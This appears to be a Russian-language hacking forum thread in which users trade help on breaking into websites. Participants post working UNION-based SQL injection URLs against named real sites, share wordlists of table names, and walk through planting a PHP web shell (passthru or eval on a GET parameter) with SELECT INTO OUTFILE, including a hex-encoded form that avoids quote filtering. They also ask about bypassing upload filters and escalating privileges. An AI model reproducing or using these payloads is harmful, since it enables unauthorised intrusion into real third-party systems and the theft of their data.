Заливаю шелл shell.php, shell.php.doc, shell.php.txt выводит такую ошибку Wrong field content: File - allowed file extensions are PDF, PPT, PPS, DOC, XLS, TXT, HTM, HTML, GIF, JPG, RAR, ZIP Как еще можно попробывать залить шелл? Заранее всем спасибо!
http://www.hoanganjsc.com.vn/product.php?prodid=-90+/*!union*/select+1,2,UNHEX(HEX(concat_ws(0x3a,table_schema,table_name,column_name))),4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/**/from/**/information_schema.columns+limit+1,1--
Где можно регнуть базу данных MySQL так что бы можно запускать скрипты на взломанном сервере, а база данных была отдельно?? P.S. сори немного не по теме может!!
Monaxdixon Чаще всего что то типо user users admin mysql members phpbb_users и так далее!! Вот список из 650 таблиц которые чаще всего бывают http://narod.ru/disk/21459300000/tabl.rar.html
скачай SIPT с ним идет небольшой словарик таблиц, думаю хватит ибо если там нет то обычно тогда идет просто долбанутый префикс к нажваниям таблы который просто так не брутанеш
Microsoft JET Database Engine error '80040e14' Этот сайт является пользователем таблицы http://www.southend.gov.uk/news/default.asp?id=946' Microsoft JET Database Engine error '80040e14' Syntax error in string in query expression 'releaseID =946' ORDER BY displayOrder DESC'. /news/includes/applogic_head.asp, line 23 Поэтому мы получили синтаксической ошибки в " FROM clasue.", когда мы используем union? так, как мы можем придать этот сайт? http://www.southend.gov.uk/news/default.asp?id=-946+union+select+1,2%20from%20user-- Microsoft JET Database Engine error '80004005' Syntax error in FROM clause. /news/includes/applogic_head.asp, line 23
net eto access injection..pervoe nayti table_name a potomo column number// naprimer http://www.southend.gov.uk/news/default.asp?id=946+union+select+0+from+admin
Помогите плз. Узнал через пхп инъекц. доступ от МУСКУл. Создаю в файле запрос select '<?php passthru($_GET['cmd'])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php' Пишет ошибку,так как у нас $_GET['cmd'] Подскажите как обойти эти кавычки =)
во-первых можно захексить - Code: select 0x3C3F70687020706173737468727528245F4745545B27636D64275D293F3E into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php' во-вторых можно без кавычек Code: select '<?php passthru($_GET[cmd])?>' into outfile '/usr/home/yana2/www/site10/public_html/lnndx.php' в-третьих - юзай eval
вот создал запрос select '<? eval($_GET[cmd]);?>' into outfile блабла файл создался, пишет ошибку Parse error: syntax error, unexpected ')' in /usr/home/yana2/www/site10/public_html/lnd2.php on line 1 я чето не вижу в синтаксисе ошибку((
Я ведь делаю запрос со своего сервера, с файла $query ="select '<? echo eval($_GET['cmd']);?>' into outfile '/usr/home/yana2/www/site10/public_html/lnd10.php'"; $res = mysql_query($query); ошибка syntax error Если пишу eval($_GET[cmd]); <- без кавычек то оштбка:yntax error, unexpected ')' Помогите, может както кодировку понятную мускул зделать?
О )) спс)) все работает) И еще один может глупый вопрос, можно ли както повысить права на папку имея только шелл?
привет команде; Можно ли придать этим сайтом? потому что я пытался, но никакого результата http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%27 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''36''' at line 1 http://www.aquaticplantcentral.com/forumapc/plantfinder/details.php?id=36%20order%20by%201000-- <-true
